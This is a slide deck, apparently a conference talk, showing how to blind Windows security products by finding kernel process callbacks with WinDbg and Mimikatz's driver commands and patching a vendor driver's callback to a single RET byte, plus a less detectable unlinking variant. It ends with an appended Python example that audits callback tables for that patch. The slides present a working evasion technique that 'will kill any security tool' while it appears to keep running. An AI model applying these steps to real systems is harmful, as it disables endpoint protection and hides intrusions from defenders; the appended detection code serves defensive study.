
Killing any security product … using a Mimikatz undocumented feature

  1. Killing any security product … using a Mimikatz undocumented feature
     @newsoft
  2. How to write a security product for Windows?
     “There is only one way to do it” … since Windows Vista
  3. How to write a security product for Windows?
       ObRegisterCallbacks
       PsSetCreateProcessNotifyRoutine (process)
       PsSetCreateProcessNotifyRoutineEx
       PsSetCreateThreadNotifyRoutine (thread)
       PsSetCreateThreadNotifyRoutineEx
       PsSetLoadImageNotifyRoutine
       CmRegisterCallback (registry)
       CmRegisterCallbackEx
       FltRegisterFilter (file)
       FltStartFiltering
  4. Finding process callbacks with WinDbg
       kd> dd nt!PspCreateProcessNotifyRoutineCount l1
       fffff800`02a821a4 00000005
       kd> dd nt!PspCreateProcessNotifyRoutineExCount l1
       fffff800`02a821a0 00000002
       kd> dp nt!PspCreateProcessNotifyRoutine l8
       fffff800`02a81fa0 fffff8a0`00008d6f fffff8a0`001b79ff
       fffff800`02a81fb0 fffff8a0`002e784f fffff8a0`002e7bff
       fffff800`02a81fc0 fffff8a0`003f295f fffff8a0`001dc53f
       fffff800`02a81fd0 fffff8a0`031ef24f 00000000`00000000
  5. Other callbacks
       kd> dd nt!PspCreatethreadNotifyRoutineCount l1      <<< Thread
       fffff800`02a81f80 00000000
       kd> dd nt!PspLoadImageNotifyRoutineCount l1         <<< Image load
       fffff800`02a81d60 00000002
       kd> dp nt!PspLoadImageNotifyRoutine l3
       fffff800`02a81d20 fffff8a0`000927ef fffff8a0`002a23cf
       fffff800`02a81d30 00000000`00000000
       kd> dd nt!CmpCallBackCount l1                       <<< Registry
       fffff800`02a63b04 00000001
       kd> x nt!CallbackListHead
       fffff800`02ad8970 nt!CallbackListHead = <no type information>
  6. We need automation! Enter Mimikatz magic ...
  7. Magic command #1
       mimikatz # !+
       [*] mimikatz driver not present
       [+] mimikatz driver successfully registered
       [+] mimikatz driver ACL to everyone
       [+] mimikatz driver started
  8. Magic command #2
       mimikatz # !notifObject
       ...
       * Process *
         Callback [type 3]
           PreOperation : 0xFFFFF880035B66E0 [ehdrv.sys + 0x0001c6e0]
           Open     - 0xFFFFF80002D9D300 [ntoskrnl.exe + 0x00348300]
           Close    - 0xFFFFF80002D83010 [ntoskrnl.exe + 0x0032e010]
           Delete   - 0xFFFFF80002D822C0 [ntoskrnl.exe + 0x0032d2c0]
           Security - 0xFFFFF80002DB52A0 [ntoskrnl.exe + 0x003602a0]
       ...
  9. Back in WinDbg
       kd> e ehdrv+0x0001c6e0 c3
     0xC3 == RET opcode. After this patch, the notification callback will do nothing.
     Unlinking from the callbacks list is also doable:
       ● Requires more work ...
       ● … but is less detectable (no code alteration)
  10. Conclusion
      Cons
        ● You need kernel write access
          ○ Being able to write a single NULL byte is enough, though
      Pros
        ● Will kill any security tool
        ● The software will still be “active and running” from a monitoring point of view - just not being notified
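As an added example (not part of the slides and not Mimikatz code), the callback table dumped on slides 4 and 5 can be decoded offline and each routine checked for the one-byte RET patch shown on slide 9, which is the integrity check a defender would run over registered kernel callbacks. The Win7 x64 EX_FAST_REF layout, the module sizes and the memory contents are assumptions; module bases are derived from the offsets printed on slide 8.

```python
# Constructed sample laid out like the `dp nt!PspCreateProcessNotifyRoutine l8` listing
# on slide 4 (Windows 7 x64): an address column followed by two qword entries per line.
SAMPLE_DP = """\
fffff800`02a81fa0 fffff8a0`00008d6f fffff8a0`001b79ff
fffff800`02a81fb0 fffff8a0`002e784f fffff8a0`002e7bff
fffff800`02a81fc0 fffff8a0`003f295f fffff8a0`001dc53f
fffff800`02a81fd0 fffff8a0`031ef24f 00000000`00000000
"""
def parse_dp(text):
    """Non-zero qword entries of a WinDbg `dp` listing, skipping the address column."""
    entries = []
    for line in text.splitlines():
        for tok in line.split()[1:]:
            value = int(tok.replace("`", ""), 16)
            if value:
                entries.append(value)
    return entries

def callback_block(entry):
    """Assumption (Win7 x64 layout, not on the slides): entries are EX_FAST_REFs, low 4 bits
    a refcount; masking gives the EX_CALLBACK_ROUTINE_BLOCK, whose routine pointer is at +8."""
    return entry & ~0xF

def module_for(addr, modules):
    """Loaded module containing addr, or None. modules: name -> (base, size)."""
    for name, (base, size) in modules.items():
        if base <= addr < base + size:
            return name
    return None

def audit_callback(func_addr, modules, read_byte):
    """Two checks a defender runs over each routine: is it inside a loaded module, and
    is its first byte 0xC3 (RET), i.e. patched into a no-op as on slide 9?"""
    findings = []
    owner = module_for(func_addr, modules)
    if owner is None:
        findings.append("callback outside any loaded module")
    if read_byte(func_addr) == 0xC3:
        findings.append("first instruction is RET: callback neutralised")
    return owner, findings

# Constructed memory view: the ehdrv.sys PreOperation routine from slide 8 after the
# one-byte patch of slide 9. Bases follow from the slide's offsets; sizes are placeholders.
EHDRV_CB = 0xFFFFF880035B66E0
MODULES = {"ehdrv.sys": (0xFFFFF8800359A000, 0x40000),
           "ntoskrnl.exe": (0xFFFFF80002A55000, 0x5E9000)}
MEMORY = {EHDRV_CB: 0xC3}
def demo_read(addr):
    return MEMORY.get(addr, 0x48)  # unpatched addresses return a typical x64 prologue byte
```

A real implementation would replace demo_read with a kernel-memory read (e.g. from a memory image) and MODULES with the loaded-module list, then compare routine pointers against the EX_CALLBACK_ROUTINE_BLOCK contents.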
